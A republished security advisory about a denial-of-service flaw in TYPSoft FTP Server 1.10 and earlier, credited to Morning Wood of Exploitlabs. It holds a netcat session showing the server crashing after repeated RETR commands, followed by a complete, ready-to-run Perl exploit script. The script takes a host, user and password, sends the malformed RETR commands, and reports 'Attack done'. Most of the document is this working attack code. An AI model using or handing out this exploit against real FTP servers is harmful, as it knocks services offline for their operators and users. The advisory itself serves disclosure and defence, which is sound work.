TYPSoft FTP Server RETR DoSSummary
"TYPSoft FTP Server is a fast and easy FTP server with support to Standard FTP Command, Clean interface, Virtual File System architecture, ability to resume Download and Upload, IP Restriction, Login/Quit message, logs, Multi Language and many other things."
By crafting special request for TYPSoft FTP Server, it is possible to crash the server creating a DoS attack.
Credit:
The information has been provided by Morning Wood.
The original article can be found at: http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt
Details
Vulnerable Systems:
* TYPSoft FTP Server version 1.10 and prior
By sending RETR command to Typsoft FTP server, attackers can cause the server to crash making a DoS attack.
Proof of Concept:
nc -v 192.168.0.2 21
ftpserv [192.168.0.2] 21 (ftp) open
220 TYPSoft FTP Server 1.11 ready...
USER ok
331 Password required for ok.
PASS ok
230 User ok logged in.
RETR 0
150 Opening data connection for 0.
RETR 0
150 Opening data connection for 0.
[ crash here ]
Exception ESocketException in module ftpserv.exe at 000862A6 "no port specified"
Exploit:
#!/usr/bin/perl
use IO::Socket;
use Socket;
print "\n-= TYPSoft FTP Server <= v1.11 DOS =-\n";
print "-= wood (at) Exploitlabs.com =-\n\n";
if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typsoft-1.11-DOS.pl <host> <user> <pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };
$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err1 = "RETR 0";
$err2 = "RETR 1";
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";
$remote->autoflush(1);
print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: cant send user\n";
print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: cant send pass\n";
print $remote "$err1/\n" and print "3. Sending : ErrorCode 1...\n";
print $remote "$err2/\n" and print "4. Sending : ErrorCode 2...\n\n"or die
"Error: cant send error code\n";
print "Attack done. press any key to exit\n";
$bla= <STDIN>;
close $remote;
#EoF
推荐
评论(0条)
